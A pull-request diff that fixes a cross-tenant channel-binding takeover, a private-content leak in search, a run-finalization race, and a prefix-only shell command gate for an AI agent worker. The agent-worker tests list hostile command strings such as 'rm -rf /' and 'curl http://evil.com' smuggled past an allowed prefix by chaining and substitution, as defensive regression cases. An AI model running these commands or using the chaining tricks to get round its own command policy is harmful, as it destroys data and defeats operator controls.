### PR TITLE
fix: correctness/security bugs from multi-agent audit (rebased onto main)

### DIFF
--- a/db/migrations/00000000000000_baseline.sql
+++ b/db/migrations/00000000000000_baseline.sql
@@ -2630,11 +2630,11 @@ ALTER TABLE ONLY public.account
     ADD CONSTRAINT account_pkey PRIMARY KEY (id);
 
 --
--- Name: agent_channel_bindings agent_channel_bindings_platform_channel_id_team_id_key; Type: CONSTRAINT; Schema: public; Owner: -
+-- Name: agent_channel_bindings agent_channel_bindings_org_platform_channel_team_key; Type: CONSTRAINT; Schema: public; Owner: -
 --
 
 ALTER TABLE ONLY public.agent_channel_bindings
-    ADD CONSTRAINT agent_channel_bindings_platform_channel_id_team_id_key UNIQUE (platform, channel_id, team_id);
+    ADD CONSTRAINT agent_channel_bindings_org_platform_channel_team_key UNIQUE (organization_id, platform, channel_id, team_id);
 
 --
 -- Name: agent_connections agent_connections_pkey; Type: CONSTRAINT; Schema: public; Owner: -
@@ -3228,10 +3228,10 @@ CREATE INDEX "account_userId_idx" ON public.account USING btree ("userId");
 CREATE INDEX agent_channel_bindings_agent_id_idx ON public.agent_channel_bindings USING btree (agent_id);
 
 --
--- Name: agent_channel_bindings_no_team_unique; Type: INDEX; Schema: public; Owner: -
+-- Name: agent_channel_bindings_org_no_team_unique; Type: INDEX; Schema: public; Owner: -
 --
 
-CREATE UNIQUE INDEX agent_channel_bindings_no_team_unique ON public.agent_channel_bindings USING btree (platform, channel_id) WHERE (team_id IS NULL);
+CREATE UNIQUE INDEX agent_channel_bindings_org_no_team_unique ON public.agent_channel_bindings USING btree (organization_id, platform, channel_id) WHERE (team_id IS NULL);
 
 --
 -- Name: agent_channel_bindings_org_agent_idx; Type: INDEX; Schema: public; Owner: -

--- a/db/migrations/20260603120000_org_scope_channel_bindings.sql
+++ b/db/migrations/20260603120000_org_scope_channel_bindings.sql
@@ -1,0 +1,74 @@
+-- migrate:up
+
+-- Org-scope the channel-binding uniqueness.
+--
+-- Before: uniqueness was GLOBAL across all tenants —
+--   UNIQUE (platform, channel_id, team_id)
+--   + partial UNIQUE (platform, channel_id) WHERE team_id IS NULL
+-- so two organizations could never independently bind the same
+-- platform+channel. Worse, `createBinding` did
+--   ON CONFLICT (...) DO UPDATE SET agent_id = EXCLUDED.agent_id,
+--     organization_id = EXCLUDED.organization_id
+-- so a second org binding the same platform+channel collided with the first
+-- org's row and rewrote its `organization_id` to itself — a silent
+-- cross-tenant takeover (the first org's binding vanished).
+--
+-- After: the key is org-scoped, so each org owns its own binding row for the
+-- same platform+channel.
+--
+-- Migration safety: the new key is strictly MORE permissive than the old
+-- global one (it adds `organization_id` as a leading column). Every set of
+-- rows that satisfied the old global uniqueness trivially satisfies the
+-- org-scoped uniqueness, so existing data migrates without conflict — no
+-- pre-flight de-dup is required. All statements are idempotent
+-- (DROP ... IF EXISTS / CREATE ... IF NOT EXISTS / guarded ADD CONSTRAINT)
+-- so the forward delta replays cleanly per the embedded-runtime contract.
+
+-- (1) Drop the global team-id-set UNIQUE constraint.
+ALTER TABLE public.agent_channel_bindings
+  DROP CONSTRAINT IF EXISTS agent_channel_bindings_platform_channel_id_team_id_key;
+
+-- (2) Add the org-scoped UNIQUE constraint (covers the team_id-set case;
+-- PG treats NULL team_id rows as distinct, so they don't conflict here).
+DO $$
+BEGIN
+  IF NOT EXISTS (
+    SELECT 1 FROM pg_constraint
+    WHERE conname = 'agent_channel_bindings_org_platform_channel_team_key'
+      AND conrelid = 'public.agent_channel_bindings'::regclass
+  ) THEN
+    ALTER TABLE public.agent_channel_bindings
+      ADD CONSTRAINT agent_channel_bindings_org_platform_channel_team_key
+      UNIQUE (organization_id, platform, channel_id, team_id);
+  END IF;
+END$$;
+
+-- (3) Replace the global team_id-IS-NULL partial unique index with an
+-- org-scoped one.
+DROP INDEX IF EXISTS public.agent_channel_bindings_no_team_unique;
+CREATE UNIQUE INDEX IF NOT EXISTS agent_channel_bindings_org_no_team_unique
+  ON public.agent_channel_bindings USING btree (organization_id, platform, channel_id)
+  WHERE (team_id IS NULL);
+
+-- migrate:down
+
+DROP INDEX IF EXISTS public.agent_channel_bindings_org_no_team_unique;
+CREATE UNIQUE INDEX IF NOT EXISTS agent_channel_bindings_no_team_unique
+  ON public.agent_channel_bindings USING btree (platform, channel_id)
+  WHERE (team_id IS NULL);
+
+ALTER TABLE public.agent_channel_bindings
+  DROP CONSTRAINT IF EXISTS agent_channel_bindings_org_platform_channel_team_key;
+
+DO $$
+BEGIN
+  IF NOT EXISTS (
+    SELECT 1 FROM pg_constraint
+    WHERE conname = 'agent_channel_bindings_platform_channel_id_team_id_key'
+      AND conrelid = 'public.agent_channel_bindings'::regclass
+  ) THEN
+    ALTER TABLE public.agent_channel_bindings
+      ADD CONSTRAINT agent_channel_bindings_platform_channel_id_team_id_key
+      UNIQUE (platform, channel_id, team_id);
+  END IF;
+END$$;

--- a/packages/agent-worker/src/__tests__/tool-policy-command-chaining.test.ts
+++ b/packages/agent-worker/src/__tests__/tool-policy-command-chaining.test.ts
@@ -41,6 +41,8 @@ describe("enforceBashCommandPolicy command-chaining bypass", () => {
     "git status & rm -rf /",
     "echo hi; echo hi; rm -rf /",
     "git log; sudo apt install evil", // deny via default package-manager prefix
+    "cat <(rm -rf /)", // process substitution
+    "diff <(echo a) >(rm -rf /)", // output process substitution
   ];
 
   for (const cmd of denyChained) {

--- a/packages/agent-worker/src/__tests__/tool-policy-command-chaining.test.ts
+++ b/packages/agent-worker/src/__tests__/tool-policy-command-chaining.test.ts
@@ -1,0 +1,114 @@
+/**
+ * Command-chaining bypass regression tests for enforceBashCommandPolicy.
+ *
+ * The allow/deny policy used to be a prefix match against the ENTIRE command
+ * string. That let an allowed prefix smuggle a denied command past the gate via
+ * shell chaining/substitution:
+ *
+ *   - "git status && rm -rf /"     (allowed prefix, then denied command)
+ *   - "git status; curl evil.com"  (allowed prefix, then non-allowlisted command)
+ *   - "git status | sh"            (pipe into a non-allowlisted interpreter)
+ *   - "git status $(rm -rf /)"     (command substitution)
+ *   - "git status `rm -rf /`"      (backtick substitution)
+ *   - "git status\nrm -rf /"       (newline-separated)
+ *
+ * The fix splits on shell separators and applies the prefix check to EVERY
+ * sub-command: deny if ANY segment is denied, and (when an allowlist is active)
+ * require EVERY segment to match an allow prefix.
+ */
+
+import { describe, expect, test } from "bun:test";
+import {
+  type BashCommandPolicy,
+  enforceBashCommandPolicy,
+} from "../openclaw/tool-policy";
+
+describe("enforceBashCommandPolicy command-chaining bypass", () => {
+  const denyPolicy: BashCommandPolicy = {
+    allowAll: true,
+    allowPrefixes: [],
+    denyPrefixes: ["rm "],
+  };
+
+  const denyChained = [
+    "git status && rm -rf /",
+    "git status ; rm -rf /",
+    "git status || rm -rf /",
+    "true | rm -rf /",
+    "git status $(rm -rf /)",
+    "git status `rm -rf /`",
+    "git status\nrm -rf /",
+    "git status & rm -rf /",
+    "echo hi; echo hi; rm -rf /",
+    "git log; sudo apt install evil", // deny via default package-manager prefix
+  ];
+
+  for (const cmd of denyChained) {
+    test(`denied segment is caught: ${JSON.stringify(cmd)}`, () => {
+      const policy: BashCommandPolicy = cmd.includes("apt")
+        ? {
+            allowAll: true,
+            allowPrefixes: [],
+            denyPrefixes: ["rm ", "sudo apt "],
+          }
+        : denyPolicy;
+      expect(() => enforceBashCommandPolicy(cmd, policy)).toThrow(
+        "Bash command denied by policy"
+      );
+    });
+  }
+
+  const allowOnlyGit: BashCommandPolicy = {
+    allowAll: false,
+    allowPrefixes: ["git"],
+    denyPrefixes: [],
+  };
+
+  const allowlistBypass = [
+    "git status && curl http://evil.com",
+    "git status; curl http://evil.com",
+    "git status | sh",
+    "git status $(curl http://evil.com)",
+    "git status `curl http://evil.com`",
+    "git status\ncurl http://evil.com",
+  ];
+
+  for (const cmd of allowlistBypass) {
+    test(`non-allowlisted segment is rejected: ${JSON.stringify(cmd)}`, () => {
+      expect(() => enforceBashCommandPolicy(cmd, allowOnlyGit)).toThrow(
+        "Bash command not allowed by policy"
+      );
+    });
+  }
+
+  test("every segment matching the allowlist still passes", () => {
+    const policy: BashCommandPolicy = {
+      allowAll: false,
+      allowPrefixes: ["git", "echo"],
+      denyPrefixes: [],
+    };
+    expect(() =>
+      enforceBashCommandPolicy("git status && echo done", policy)
+    ).not.toThrow();
+    expect(() =>
+      enforceBashCommandPolicy("echo start; git pull | git apply", policy)
+    ).not.toThrow();
+  });
+
+  test("a single allowed command (no chaining) still passes", () => {
+    expect(() =>
+      enforceBashCommandPolicy("git status", allowOnlyGit)
+    ).not.toThrow();
+  });
+
+  test("chained allowed commands with one denied segment are rejected", () => {
+    const policy: BashCommandPolicy = {
+      allowAll: false,
+      allowPrefixes: ["git", "echo"],
+      denyPrefixes: ["git push"],
+    };
+    expect(() =>
+      enforceBashCommandPolicy("echo deploying && git push origin main", policy)
+    ).toThrow("Bash command denied by policy");
+  });
+});

--- a/packages/agent-worker/src/openclaw/tool-policy.ts
+++ b/packages/agent-worker/src/openclaw/tool-policy.ts
@@ -283,6 +283,14 @@ function splitShellCommands(command: string): string[] {
       i++; // consume "("
       continue;
     }
+    // Process substitution: `<( … )` / `>( … )` runs the inner command, so the
+    // boundary starts a new segment and the substituted body is checked on its
+    // own (e.g. `cat <(rm -rf /)` must not let `rm` ride inside the `cat` segment).
+    if ((ch === "<" || ch === ">") && next === "(") {
+      push();
+      i++; // consume "("
+      continue;
+    }
     if (ch === ")" || ch === "`") {
       push();
       continue;

--- a/packages/agent-worker/src/openclaw/tool-policy.ts
+++ b/packages/agent-worker/src/openclaw/tool-policy.ts
@@ -207,35 +207,139 @@ export function isToolAllowedByPolicy(
   );
 }
 
+/**
+ * Split a shell command into its individual sub-commands.
+ *
+ * A prefix-only allow/deny check is trivially bypassed by command chaining and
+ * substitution: an allowed prefix (`git status`) followed by `;`, `&&`, `||`,
+ * `|`, a newline, `$( … )`, or backticks runs an arbitrary second command that
+ * the policy never inspects. To close that hole we evaluate the prefix check
+ * against EVERY sub-command, not just the leading one.
+ *
+ * This is a deliberately conservative lexer — not a full shell parser. It walks
+ * the string tracking single/double quotes and treats any of the shell control
+ * operators, plus the boundaries of `$( … )` / backtick substitutions, as
+ * segment separators. Substitution boundaries are split rather than recursed so
+ * the substituted command body is checked as its own segment. Quoted operators
+ * (e.g. `echo "a; b"`) are intentionally left intact — they are data, not a new
+ * command — while unquoted ones start a new segment.
+ */
+function splitShellCommands(command: string): string[] {
+  const segments: string[] = [];
+  let current = "";
+  let inSingle = false;
+  let inDouble = false;
+
+  const push = () => {
+    const trimmed = current.trim();
+    if (trimmed) {
+      segments.push(trimmed);
+    }
+    current = "";
+  };
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i];
+    const next = command[i + 1];
+
+    if (inSingle) {
+      if (ch === "'") {
+        inSingle = false;
+      } else {
+        current += ch;
+      }
+      continue;
+    }
+
+    if (inDouble) {
+      // Inside double quotes only `$( … )` / backticks introduce a new command;
+      // everything else (including `;`, `&&`, `|`) is literal data.
+      if (ch === '"') {
+        inDouble = false;
+      } else if (ch === "$" && next === "(") {
+        push();
+        i++; // consume "("
+      } else if (ch === "`") {
+        push();
+      } else {
+        current += ch;
+      }
+      continue;
+    }
+
+    if (ch === "'") {
+      inSingle = true;
+      continue;
+    }
+    if (ch === '"') {
+      inDouble = true;
+      continue;
+    }
+
+    // Command-substitution boundaries become segment separators so the
+    // substituted body is checked on its own.
+    if (ch === "$" && next === "(") {
+      push();
+      i++; // consume "("
+      continue;
+    }
+    if (ch === ")" || ch === "`") {
+      push();
+      continue;
+    }
+
+    // Control operators: ; & && | || and newlines.
+    if (ch === "\n" || ch === ";") {
+      push();
+      continue;
+    }
+    if (ch === "&" || ch === "|") {
+      push();
+      if (next === ch) {
+        i++; // collapse && / ||
+      }
+      continue;
+    }
+
+    current += ch;
+  }
+
+  push();
+  return segments;
+}
+
 export function enforceBashCommandPolicy(
   command: string,
   policy: BashCommandPolicy
 ): void {
-  const trimmed = command.trim();
-  if (!trimmed) {
+  if (!command.trim()) {
     return;
   }
 
-  const normalizedCommand = trimmed.toLowerCase();
-  const denyMatchPrefix = policy.denyPrefixes.find((prefix) =>
-    normalizedCommand.startsWith(prefix.toLowerCase())
-  );
-  if (denyMatchPrefix) {
-    throw new Error("Bash command denied by policy");
-  }
-
-  if (policy.allowAll) {
+  const segments = splitShellCommands(command);
+  if (segments.length === 0) {
     return;
   }
 
-  if (policy.allowPrefixes.length === 0) {
-    return;
-  }
+  const hasAllowlist = !policy.allowAll && policy.allowPrefixes.length > 0;
 
-  const allowMatch = policy.allowPrefixes.some((prefix) =>
-    normalizedCommand.startsWith(prefix.toLowerCase())
-  );
-  if (!allowMatch) {
-    throw new Error("Bash command not allowed by policy");
+  for (const segment of segments) {
+    const normalizedSegment = segment.toLowerCase();
+
+    const denied = policy.denyPrefixes.some((prefix) =>
+      normalizedSegment.startsWith(prefix.toLowerCase())
+    );
+    if (denied) {
+      throw new Error("Bash command denied by policy");
+    }
+
+    if (hasAllowlist) {
+      const allowed = policy.allowPrefixes.some((prefix) =>
+        normalizedSegment.startsWith(prefix.toLowerCase())
+      );
+      if (!allowed) {
+        throw new Error("Bash command not allowed by policy");
+      }
+    }
   }
 }

--- a/packages/server/src/__tests__/integration/complete-worker-job-status-guard.test.ts
+++ b/packages/server/src/__tests__/integration/complete-worker-job-status-guard.test.ts
@@ -1,0 +1,290 @@
+/**
+ * completeWorkerJob status-guard reproducer.
+ *
+ * Bug: completeWorkerJob finalized a run with a bare `WHERE id = run_id`
+ * UPDATE — no `status = 'running'` / `claimed_by` guard. So a worker that
+ * reports in AFTER the gateway already reaped the run on timeout
+ * (status -> 'timeout') would:
+ *   1. resurrect the run (overwrite the terminal 'timeout' with 'completed'/
+ *      'failed'), and
+ *   2. re-run the feed/auth bookkeeping a SECOND time — double-incrementing
+ *      consecutive_failures / items_collected and rewriting next_run_at,
+ *      even though the timeout path already accounted for the run.
+ *
+ * The fix mirrors completeActionRun: the terminal UPDATE carries
+ * `AND status = 'running' AND claimed_by = worker_id` + RETURNING, and on a
+ * 0-row match we short-circuit with an idempotent `already_finalized`
+ * response BEFORE touching feeds/auth.
+ *
+ * Red (pre-fix): the late completion flips status away from 'timeout' AND
+ * bumps the feed counters. Green (post-fix): status stays 'timeout', feed
+ * counters are untouched, handler returns { success: false,
+ * reason: 'already_finalized' }.
+ *
+ * This drives the REAL exported completeWorkerJob handler against the
+ * embedded DB via a minimal Hono Context (same approach as
+ * embedding-model-swap-e2e.test.ts). The mock context has no
+ * workerAuthMode, so authorizeRunForWorker is a no-op — which isolates the
+ * guard under test to completeWorkerJob's own UPDATE, exactly as the
+ * timeout race would in production (the status flips AFTER
+ * authorizeRunForWorker's read, in the TOCTOU window before the UPDATE).
+ */
+
+import type { Context } from 'hono';
+import { beforeEach, describe, expect, it } from 'vitest';
+import type { Env } from '../../index';
+import { completeWorkerJob } from '../../worker-api';
+import { cleanupTestDatabase, getTestDb } from '../setup/test-db';
+import { createTestOrganization } from '../setup/test-fixtures';
+
+const WORKER_ID = 'worker-late';
+
+function mockWorkerCtx(body: unknown): {
+  ctx: Context<{ Bindings: Env }>;
+  result: () => { body: unknown; status: number };
+} {
+  let captured: { body: unknown; status: number } = { body: undefined, status: 200 };
+  const ctx = {
+    req: { json: async () => body },
+    var: {},
+    json: (b: unknown, status?: number) => {
+      captured = { body: b, status: status ?? 200 };
+      return captured as unknown as Response;
+    },
+  } as unknown as Context<{ Bindings: Env }>;
+  return { ctx, result: () => captured };
+}
+
+async function insertConnection(organizationId: string): Promise<number> {
+  const sql = getTestDb();
+  const rows = (await sql`
+    INSERT INTO connections
+      (organization_id, connector_key, status, visibility, slug, created_at, updated_at)
+    VALUES
+      (${organizationId}, 'chrome', 'active', 'org', 'chrome-guard-test', NOW(), NOW())
+    RETURNING id
+  `) as Array<{ id: number }>;
+  return rows[0].id;
+}
+
+async function insertFeed(organizationId: string, connectionId: number): Promise<number> {
+  const sql = getTestDb();
+  const rows = (await sql`
+    INSERT INTO feeds
+      (organization_id, connection_id, feed_key, status, schedule,
+       consecutive_failures, items_collected, last_sync_status, created_at, updated_at)
+    VALUES
+      (${organizationId}, ${connectionId}, 'chrome-feed', 'active', '0 */6 * * *',
+       3, 10, 'failed', NOW(), NOW())
+    RETURNING id
+  `) as Array<{ id: number }>;
+  return rows[0].id;
+}
+
+/**
+ * Seed a run that has ALREADY been reaped on timeout: status='timeout',
+ * but still bears the claim (`claimed_by`) of the worker that's about to
+ * report in late. This is the exact shape of a run when the gateway's
+ * timeout reaper flipped the status while the worker was still running.
+ */
+async function insertReapedRun(
+  organizationId: string,
+  connectionId: number,
+  feedId: number
+): Promise<number> {
+  const sql = getTestDb();
+  const rows = (await sql`
+    INSERT INTO runs
+      (organization_id, run_type, feed_id, connection_id, connector_key,
+       connector_version, status, claimed_by, claimed_at, completed_at,
+       error_message, created_at)
+    VALUES
+      (${organizationId}, 'sync', ${feedId}, ${connectionId}, 'chrome', '0.2.0',
+       'timeout', ${WORKER_ID}, NOW(), NOW(), 'reaped-on-timeout', NOW())
+    RETURNING id
+  `) as Array<{ id: number }>;
+  return rows[0].id;
+}
+
+describe('completeWorkerJob status guard (late-completion-after-timeout)', () => {
+  beforeEach(async () => {
+    await cleanupTestDatabase();
+  });
+
+  it('does NOT resurrect a reaped run or double-apply feed bookkeeping on late failed completion', async () => {
+    const org = await createTestOrganization();
+    const connId = await insertConnection(org.id);
+    const feedId = await insertFeed(org.id, connId);
+    const runId = await insertReapedRun(org.id, connId, feedId);
+
+    const sql = getTestDb();
+    const before = (await sql`
+      SELECT consecutive_failures, items_collected, last_sync_status
+      FROM feeds WHERE id = ${feedId}
+    `) as Array<{
+      consecutive_failures: number;
+      items_collected: number | string;
+      last_sync_status: string | null;
+    }>;
+    expect(Number(before[0].consecutive_failures)).toBe(3);
+
+    // Worker reports in LATE with a failed verdict.
+    const { ctx, result } = mockWorkerCtx({
+      run_id: runId,
+      worker_id: WORKER_ID,
+      status: 'failed',
+      items_collected: 0,
+      error_message: 'too late',
+    });
+    await completeWorkerJob(ctx);
+
+    // Handler must report the no-op idempotently.
+    expect(result().body).toEqual({ success: false, reason: 'already_finalized' });
+
+    // Run stays terminal/timeout — NOT resurrected to 'failed'.
+    const runAfter = (await sql`
+      SELECT status, error_message FROM runs WHERE id = ${runId}
+    `) as Array<{ status: string; error_message: string | null }>;
+    expect(runAfter[0].status).toBe('timeout');
+    expect(runAfter[0].error_message).toBe('reaped-on-timeout');
+
+    // Feed bookkeeping is UNTOUCHED — no second failure increment.
+    const after = (await sql`
+      SELECT consecutive_failures, items_collected, last_sync_status, last_sync_at
+      FROM feeds WHERE id = ${feedId}
+    `) as Array<{
+      consecutive_failures: number;
+      items_collected: number | string;
+      last_sync_status: string | null;
+      last_sync_at: Date | string | null;
+    }>;
+    expect(Number(after[0].consecutive_failures)).toBe(3); // not 4
+    expect(Number(after[0].items_collected)).toBe(10); // unchanged
+    expect(after[0].last_sync_at).toBeNull(); // bookkeeping never ran
+  });
+
+  it('does NOT resurrect a reaped run or double-count items on late success completion', async () => {
+    const org = await createTestOrganization();
+    const connId = await insertConnection(org.id);
+    const feedId = await insertFeed(org.id, connId);
+    const runId = await insertReapedRun(org.id, connId, feedId);
+
+    const sql = getTestDb();
+
+    const { ctx, result } = mockWorkerCtx({
+      run_id: runId,
+      worker_id: WORKER_ID,
+      status: 'success',
+      items_collected: 99,
+    });
+    await completeWorkerJob(ctx);
+
+    expect(result().body).toEqual({ success: false, reason: 'already_finalized' });
+
+    const runAfter = (await sql`
+      SELECT status FROM runs WHERE id = ${runId}
+    `) as Array<{ status: string }>;
+    expect(runAfter[0].status).toBe('timeout'); // not 'completed'
+
+    const after = (await sql`
+      SELECT consecutive_failures, items_collected, last_sync_at
+      FROM feeds WHERE id = ${feedId}
+    `) as Array<{
+      consecutive_failures: number;
+      items_collected: number | string;
+      last_sync_at: Date | string | null;
+    }>;
+    expect(Number(after[0].items_collected)).toBe(10); // not 10 + 99
+    expect(Number(after[0].consecutive_failures)).toBe(3); // success would have reset to 0
+    expect(after[0].last_sync_at).toBeNull();
+  });
+
+  it('still finalizes a genuinely running run + applies feed bookkeeping once', async () => {
+    const org = await createTestOrganization();
+    const connId = await insertConnection(org.id);
+    const feedId = await insertFeed(org.id, connId);
+
+    const sql = getTestDb();
+    // A live, claimed, running run — the happy path.
+    const runRows = (await sql`
+      INSERT INTO runs
+        (organization_id, run_type, feed_id, connection_id, connector_key,
+         connector_version, status, claimed_by, claimed_at, created_at)
+      VALUES
+        (${org.id}, 'sync', ${feedId}, ${connId}, 'chrome', '0.2.0',
+         'running', ${WORKER_ID}, NOW(), NOW())
+      RETURNING id
+    `) as Array<{ id: number }>;
+    const runId = runRows[0].id;
+
+    const { ctx, result } = mockWorkerCtx({
+      run_id: runId,
+      worker_id: WORKER_ID,
+      status: 'success',
+      items_collected: 7,
+    });
+    await completeWorkerJob(ctx);
+
+    expect(result().body).toEqual({ success: true });
+
+    const runAfter = (await sql`
+      SELECT status FROM runs WHERE id = ${runId}
+    `) as Array<{ status: string }>;
+    expect(runAfter[0].status).toBe('completed');
+
+    const after = (await sql`
+      SELECT consecutive_failures, items_collected, last_sync_status, last_sync_at
+      FROM feeds WHERE id = ${feedId}
+    `) as Array<{
+      consecutive_failures: number;
+      items_collected: number | string;
+      last_sync_status: string | null;
+      last_sync_at: Date | string | null;
+    }>;
+    expect(Number(after[0].consecutive_failures)).toBe(0); // success reset
+    expect(Number(after[0].items_collected)).toBe(10 + 7); // applied once
+    expect(after[0].last_sync_status).toBe('success');
+    expect(after[0].last_sync_at).not.toBeNull();
+  });
+
+  it('rejects a late completion from a DIFFERENT worker than the claimant', async () => {
+    const org = await createTestOrganization();
+    const connId = await insertConnection(org.id);
+    const feedId = await insertFeed(org.id, connId);
+
+    const sql = getTestDb();
+    // Run is genuinely running, claimed by WORKER_ID.
+    const runRows = (await sql`
+      INSERT INTO runs
+        (organization_id, run_type, feed_id, connection_id, connector_key,
+         connector_version, status, claimed_by, claimed_at, created_at)
+      VALUES
+        (${org.id}, 'sync', ${feedId}, ${connId}, 'chrome', '0.2.0',
+         'running', ${WORKER_ID}, NOW(), NOW())
+      RETURNING id
+    `) as Array<{ id: number }>;
+    const runId = runRows[0].id;
+
+    // A different worker tries to finalize it.
+    const { ctx, result } = mockWorkerCtx({
+      run_id: runId,
+      worker_id: 'some-other-worker',
+      status: 'success',
+      items_collected: 50,
+    });
+    await completeWorkerJob(ctx);
+
+    expect(result().body).toEqual({ success: false, reason: 'already_finalized' });
+
+    const runAfter = (await sql`
+      SELECT status FROM runs WHERE id = ${runId}
+    `) as Array<{ status: string }>;
+    expect(runAfter[0].status).toBe('running'); // untouched
+
+    const after = (await sql`
+      SELECT items_collected, last_sync_at FROM feeds WHERE id = ${feedId}
+    `) as Array<{ items_collected: number | string; last_sync_at: Date | string | null }>;
+    expect(Number(after[0].items_collected)).toBe(10); // not bumped
+    expect(after[0].last_sync_at).toBeNull();
+  });
+});

--- a/packages/server/src/__tests__/integration/events/search-content-visibility.test.ts
+++ b/packages/server/src/__tests__/integration/events/search-content-visibility.test.ts
@@ -1,0 +1,181 @@
+/**
+ * Integration test: connection-visibility enforcement on the `search_memory`
+ * recall path (`search()` with include_content).
+ *
+ * Regression for a private-connection content leak: `fetchContentSnippets`
+ * in tools/search.ts called `searchContentByText` WITHOUT a `visibility_scope`,
+ * so the connection-visibility clause (`buildConnectionVisibilityClause`) was
+ * skipped entirely — it short-circuits to an empty fragment when
+ * `visibility_scope.organizationId` is undefined. Because `search_memory` is
+ * publicly readable (tool-access.ts: `search_memory: null`) and
+ * `include_content` defaults to true, any org member — or an anonymous reader
+ * of a public workspace — could recall content ingested through another
+ * member's `private` connection. `get_content` already passed visibility_scope
+ * on every branch; this pins the same boundary on the recall path.
+ *
+ * NOTE: vitest is not yet wired into CI for this package (see CLAUDE memory
+ * "vitest CI gap"); runs locally against the dev Postgres as a regression
+ * record. Uses explicit embeddings so the score/recall candidate path is
+ * deterministic without depending on a live embedding service.
+ */
+
+import { beforeAll, describe, expect, it } from 'vitest';
+import type { ToolContext } from '../../../tools/registry';
+import { search } from '../../../tools/search';
+import { initWorkspaceProvider } from '../../../workspace';
+import { cleanupTestDatabase } from '../../setup/test-db';
+import {
+  addUserToOrganization,
+  createTestConnection,
+  createTestConnectorDefinition,
+  createTestEntity,
+  createTestEvent,
+  createTestOrganization,
+  createTestUser,
+  seedSystemEntityTypes,
+} from '../../setup/test-fixtures';
+
+const EMBEDDING_DIM = 768;
+
+function axisVec(axis: number): number[] {
+  const v = new Array(EMBEDDING_DIM).fill(0);
+  v[axis] = 1;
+  return v;
+}
+
+describe('search_memory recall > connection visibility enforced', () => {
+  let org: Awaited<ReturnType<typeof createTestOrganization>>;
+  let aliceUser: Awaited<ReturnType<typeof createTestUser>>;
+  let bobUser: Awaited<ReturnType<typeof createTestUser>>;
+  let entity: Awaited<ReturnType<typeof createTestEntity>>;
+
+  let orgEventId: number;
+  let alicePrivateEventId: number;
+  let bobPrivateEventId: number;
+
+  function ctxFor(userId: string | null, authed: boolean): ToolContext {
+    return {
+      organizationId: org.id,
+      userId,
+      memberRole: authed ? 'owner' : null,
+      isAuthenticated: authed,
+      tokenType: authed ? 'oauth' : 'anonymous',
+      scopedToOrg: !authed,
+      allowCrossOrg: authed,
+      scopes: authed ? ['mcp:read'] : undefined,
+    } as ToolContext;
+  }
+
+  // search() needs a query, entity_id, or embedding. Forwarding the embedding
+  // exercises fetchContentSnippets' bounded recall candidate path the same way
+  // production does, with deterministic similarity (all targets share axis 0).
+  async function recall(ctx: ToolContext) {
+    const result = await search(
+      {
+        query: 'recall-visibility-probe',
+        query_embedding: axisVec(0),
+        include_content: true,
+        content_limit: 50,
+      } as never,
+      {} as never,
+      ctx
+    );
+    return new Set((result.content ?? []).map((c) => c.id));
+  }
+
+  beforeAll(async () => {
+    await initWorkspaceProvider();
+    await cleanupTestDatabase();
+    await seedSystemEntityTypes();
+
+    org = await createTestOrganization({ name: 'Recall Visibility Org' });
+    aliceUser = await createTestUser({ email: 'alice-recall@example.com' });
+    bobUser = await createTestUser({ email: 'bob-recall@example.com' });
+    await addUserToOrganization(aliceUser.id, org.id, 'owner');
+    await addUserToOrganization(bobUser.id, org.id, 'owner');
+
+    entity = await createTestEntity({ name: 'Recall Entity', organization_id: org.id });
+
+    await createTestConnectorDefinition({
+      key: 'recall-vis-connector',
+      name: 'Recall Vis',
+      organization_id: org.id,
+    });
+
+    const orgConn = await createTestConnection({
+      organization_id: org.id,
+      connector_key: 'recall-vis-connector',
+      entity_ids: [entity.id],
+      visibility: 'org',
+      created_by: aliceUser.id,
+      display_name: 'Org-visible',
+    });
+    const alicePrivConn = await createTestConnection({
+      organization_id: org.id,
+      connector_key: 'recall-vis-connector',
+      entity_ids: [entity.id],
+      visibility: 'private',
+      created_by: aliceUser.id,
+      display_name: 'Alice private',
+    });
+    const bobPrivConn = await createTestConnection({
+      organization_id: org.id,
+      connector_key: 'recall-vis-connector',
+      entity_ids: [entity.id],
+      visibility: 'private',
+      created_by: bobUser.id,
+      display_name: 'Bob private',
+    });
+
+    orgEventId = (
+      await createTestEvent({
+        organization_id: org.id,
+        entity_id: entity.id,
+        connection_id: orgConn.id,
+        content: 'org-visible recall target',
+        embedding: axisVec(0),
+      })
+    ).id;
+    alicePrivateEventId = (
+      await createTestEvent({
+        organization_id: org.id,
+        entity_id: entity.id,
+        connection_id: alicePrivConn.id,
+        content: 'alice private recall target',
+        embedding: axisVec(0),
+      })
+    ).id;
+    bobPrivateEventId = (
+      await createTestEvent({
+        organization_id: org.id,
+        entity_id: entity.id,
+        connection_id: bobPrivConn.id,
+        content: 'bob private recall target',
+        embedding: axisVec(0),
+      })
+    ).id;
+  });
+
+  it('an org member does NOT recall another member private-connection content', async () => {
+    const ids = await recall(ctxFor(bobUser.id, true));
+    // Bob sees org-visible content and his own private content...
+    expect(ids.has(orgEventId)).toBe(true);
+    expect(ids.has(bobPrivateEventId)).toBe(true);
+    // ...but NOT Alice's private connection content (the leak).
+    expect(ids.has(alicePrivateEventId)).toBe(false);
+  });
+
+  it('the owning member DOES recall their own private-connection content', async () => {
+    const ids = await recall(ctxFor(aliceUser.id, true));
+    expect(ids.has(orgEventId)).toBe(true);
+    expect(ids.has(alicePrivateEventId)).toBe(true);
+    expect(ids.has(bobPrivateEventId)).toBe(false);
+  });
+
+  it('an anonymous public-workspace reader recalls only org-visible content', async () => {
+    const ids = await recall(ctxFor(null, false));
+    expect(ids.has(orgEventId)).toBe(true);
+    expect(ids.has(alicePrivateEventId)).toBe(false);
+    expect(ids.has(bobPrivateEventId)).toBe(false);
+  });
+});

--- a/packages/server/src/__tests__/integration/watchers/rollup-window-id-race.test.ts
+++ b/packages/server/src/__tests__/integration/watchers/rollup-window-id-race.test.ts
@@ -1,0 +1,166 @@
+/**
+ * Regression test: rollup complete_window must allocate its watcher_windows id
+ * INSIDE the same transaction as the INSERT.
+ *
+ * getNextNumericId acquires a TRANSACTION-scoped advisory lock
+ * (pg_advisory_xact_lock). The non-rollup completion path runs it inside
+ * sql.begin(tx => ...), so the lock spans the INSERT and concurrent callers
+ * serialize. The rollup path previously allocated the id with the pool client
+ * OUTSIDE any transaction — the lock released the instant getNextNumericId's
+ * implicit statement-transaction committed, before the separate INSERT ran. Two
+ * concurrent device-worker rollup completions then both computed the same
+ * MAX(id)+1 and collided on the watcher_windows primary key.
+ *
+ * Each rollup here is given a DISTINCT (window_start, granularity) so the
+ * business-uniqueness constraints (idx_watcher_windows_unique_period applies
+ * only to leaf rows; insight_windows_insight_id_granularity_window_start_key is
